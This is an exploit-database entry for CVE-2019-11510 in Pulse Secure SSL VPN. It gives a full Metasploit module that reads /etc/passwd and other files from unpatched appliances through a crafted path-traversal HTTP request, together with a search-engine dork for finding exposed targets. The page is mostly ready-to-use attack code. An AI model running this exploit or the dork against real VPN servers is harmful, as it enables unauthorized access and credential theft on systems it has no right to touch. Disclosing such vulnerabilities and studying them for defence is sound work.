Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (metasploit)

2019.08.21
us 0xDezzy (US) us
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2019-11510
CWE: CWE-275
Dork: inurl:/dana-na/ filetype:cgi


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit) # Google Dork: inurl:/dana-na/ filetype:cgi # Date: 8/20/2019 # Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera # Vendor Homepage: https://pulsesecure.net # Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 # Tested on: Linux # CVE : CVE-2019-11510 require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Post::File def initialize(info = {}) super(update_info(info, 'Name' => 'Pulse Secure - System file leak', 'Description' => %q{ Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. This exploit reads /etc/passwd as a proof of concept This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 }, 'References' => [ [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ] ], 'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, )) end def run() print_good("Checking target...") res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342) if res && res.code == 200 print_good("Target is Vulnerable!") data = res.body current_host = datastore['RHOST'] filename = "msf_sslwebsession_"+current_host+".bin" File.delete(filename) if File.exist?(filename) file_local_write(filename, data) print_good("Parsing file.......") parse() else if(res && res.code == 404) print_error("Target not Vulnerable") else print_error("Ooof, try again...") end end end def parse() current_host = datastore['RHOST'] fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r") words = 0 while (line = fileObj.gets) printable_data = line.gsub(/[^[:print:]]/, '.') array_data = printable_data.scan(/.{1,60}/m) for ar in array_data if ar != "............................................................" print_good(ar) end end #print_good(printable_data) end fileObj.close end end

References:

https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top